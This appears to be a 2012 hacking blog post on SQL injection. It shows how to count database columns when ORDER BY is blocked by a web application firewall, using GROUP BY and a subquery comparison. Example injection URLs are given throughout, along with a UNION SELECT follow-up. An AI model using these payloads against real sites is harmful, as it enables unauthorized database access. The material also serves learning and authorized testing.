Tuesday, November 20, 2012

Counting Columns in SQLi

on   in ,      1 comment
Hi there.
As we already know,the most common way to count number of columns in SQL Injection attack is via order by query.
Example as below

http://example.org/news.php?id=8 order by 5--
If the page load normally, this shows that the number of column is still in the range of 5.

http://example.org/news.php?id=8 order by 6--
Else,if the number of column already exceed its range,an error will appear and usually it'll look like
Unknown column '6' in 'order clause'
From here we know that the number of column exist is 5 and can proceed with SQLi.

http://example.org/news.php?id=-8 union select 1,2,3,4,5--
And so on.

But,if you encounter a scenario where you cant use order by because of the WAF or any reason related,there are still some ways to count it.

1 - Use group by query

 Similar to order by  technique.but instead using order by, we use GROUP BY

http://example.org/news.php?id=8 group by 5--
If the page load normally, this shows that the number of column is still in the range of 5.

http://example.org/news.php?id=8 group by 6--
Else,if the number of column already exceed its range,an error will appear and usually it'll look like
Unknown column '6' in 'group statement'

 another way is using

2 - Set the condition such as ( the main query ) = (select 1)
As example,

http://example.org/news.php?id=8 and (select * from news)=(select 1)
where we can see we try to count the number of column (using * ) from the table available (news)..
and the error message will shows the number of column such as this message
Operand should contain 5 column(s)

 Thanks,
@yappare a.k.a p0pc0rn
Share:

1 comments:

Jackzack said...

Hello there,

I am a newbie in hf. just followed you from there :p. I try some challenge in SQLi and Xss but no luck :( .Wonder that you can teach me smt about that. If you willing to so pm me in hf
ID:jackzack

Best!

November 28, 2012 at 1:57 AM

Post a Comment